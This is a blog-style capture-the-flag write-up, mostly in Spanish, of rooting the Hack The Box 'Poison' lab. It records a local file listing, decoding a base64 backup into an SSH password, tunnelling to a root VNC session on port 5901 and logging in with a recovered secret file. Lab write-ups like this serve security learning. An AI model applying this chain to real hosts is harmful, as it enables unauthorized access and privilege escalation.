Poison

by | Jun 6, 2018 | Blog

6 de junio, la guardo para publicarla después

1 probe

Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-06 11:31 BST
Nmap scan report for 10.10.10.84
Host is up (0.035s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

Encontre un info.php con lo que yo supongo es la fecha de instalación y los usuarios

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

En la página de incio dice que puedes probar una serie de archivos:

 Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
http://10.10.10.84/browse.php?file=listfiles.php 

te muestra que hay un backup 
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
http://10.10.10.84/pwdbackup.txt

muestra 

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Si lo decodeas con base 64 (porque tiene un signo de menos)

da Charix!2#4%6&8(0

asumimos que ese es el password y asi fue.

entrando después de subir el user flag puedes abrir el zip file con el mismo passwrod y te muestra

œš[|Ֆz!

Si escribes top puedes ver todo lo que esta corriendo

  PID USERNAME    THR PRI NICE   SIZE    RES STATE    TIME    WCPU COMMAND
  543 root          2  20    0 56320K  5396K select   0:02   0.06% vmtoolsd
  793 charix        1  20    0 20160K  3436K RUN      0:00   0.03% top
  785 charix        1  20    0 85228K  7900K select   0:00   0.01% sshd
  642 root          1  20    0 20636K  6140K select   0:00   0.00% sendmail
  625 root          1  20    0 99172K 11516K select   0:00   0.00% httpd
  319 root          1  20    0  9560K  5052K select   0:00   0.00% devd
  390 root          1  20    0 10500K  2396K select   0:00   0.00% syslogd
  529 root          1  20    0 23620K  8872K select   0:00   0.00% Xvnc
  540 root          1  33    0 67220K  7064K select   0:00   0.00% xterm
  782 root          1  20    0 85228K  7832K select   0:00   0.00% sshd
  786 charix        1  20    0 19660K  3624K pause    0:00   0.00% csh
  640 www           1  20    0    99M 11896K kqread   0:00   0.00% httpd
  650 root          1  20    0 12592K  2436K nanslp   0:00   0.00% cron
  620 root          1  20    0 57812K  7052K select   0:00   0.00% sshd
  541 root          1  25    0 37620K  5312K select   0:00   0.00% twm
  638 www           1  20    0    99M 11896K lockf    0:00   0.00% httpd
  641 www           1  20    0    99M 11888K lockf    0:00   0.00% httpd

En este caso lo interesante podría ser el el vnc que asumo se podrá envenenar y por eso se llama poison, vamos a ver Lineum nada….

Sockstat

charix@Poison:/etc % sockstat 
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS      
charix   sshd       785   3  tcp4   10.10.10.84:22        10.10.14.6:50008
charix   sshd       785   4  stream -> ??
root     sshd       782   3  tcp4   10.10.10.84:22        10.10.14.6:50008
root     sshd       782   5  stream -> ??
smmsp    sendmail   646   3  dgram  -> /var/run/log
www      httpd      645   3  tcp6   *:80                  *:*
www      httpd      645   4  tcp4   *:80                  *:*
root     sendmail   642   3  tcp4   127.0.0.1:25          *:*
root     sendmail   642   4  dgram  -> /var/run/logpriv
www      httpd      641   3  tcp6   *:80                  *:*
www      httpd      641   4  tcp4   *:80                  *:*
www      httpd      640   3  tcp6   *:80                  *:*
www      httpd      640   4  tcp4   *:80                  *:*
www      httpd      639   3  tcp6   *:80                  *:*
www      httpd      639   4  tcp4   *:80                  *:*
www      httpd      638   3  tcp6   *:80                  *:*
www      httpd      638   4  tcp4   *:80                  *:*
www      httpd      637   3  tcp6   *:80                  *:*
www      httpd      637   4  tcp4   *:80                  *:*
root     httpd      625   3  tcp6   *:80                  *:*
root     httpd      625   4  tcp4   *:80                  *:*
root     sshd       620   3  tcp6   *:22                  *:*
root     sshd       620   4  tcp4   *:22                  *:*
root     twm        541   3  stream -> /tmp/.X11-unix/X1
root     xterm      540   3  stream -> /tmp/.X11-unix/X1
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     Xvnc       529   4  stream /tmp/.X11-unix/X1
root     Xvnc       529   5  stream /tmp/.X11-unix/X1
root     syslogd    390   4  dgram  /var/run/log
root     syslogd    390   5  dgram  /var/run/logpriv
root     syslogd    390   6  udp6   *:514                 *:*
root     syslogd    390   7  udp4   *:514                 *:*
root     devd       319   4  stream /var/run/devd.pipe
root     devd       319   5  seqpac /var/run/devd.seqpacket.pipe
root     devd       319   7  dgram  -> /var/run/logpriv

 

 

Port 5901 Details

After several hours, I finally rooted the machine a few minutes ago. What I can add is,

  • forget the secret file as long as you don’t know the vulnerable service.
  • Once you know, what is running, you can google for how to use that service.
  • There are tons of walkthroughs on how to setup a particular connection to that service.

Hope this does not reveal too much.

revisar esto: 

charix@Poison:/etc % locate Xvnc
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__FreeBSD.cf
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__Imake.cf
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__vnclibs.def
/usr/ports/net/tightvnc/files/patch-Xvnc__config__imake__imakemdep.h
/usr/ports/net/tightvnc/files/patch-Xvnc__include__Xos.h
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__dix__Imakefile
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__vnc__sockets.c
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__xfree86__common__compiler.h
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__Imakefile
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__access.c

 

in aonther screen ssh -L 5901:localhost:5901 [email protected]  


unzip secret.zip
root@kali:~# '/root/Downloads/VNC-Viewer-6.17.1113-Linux-x64'  127.0.0.1:5901 -passwd /root/secret

and done we have root access

IPPSEC do that easier: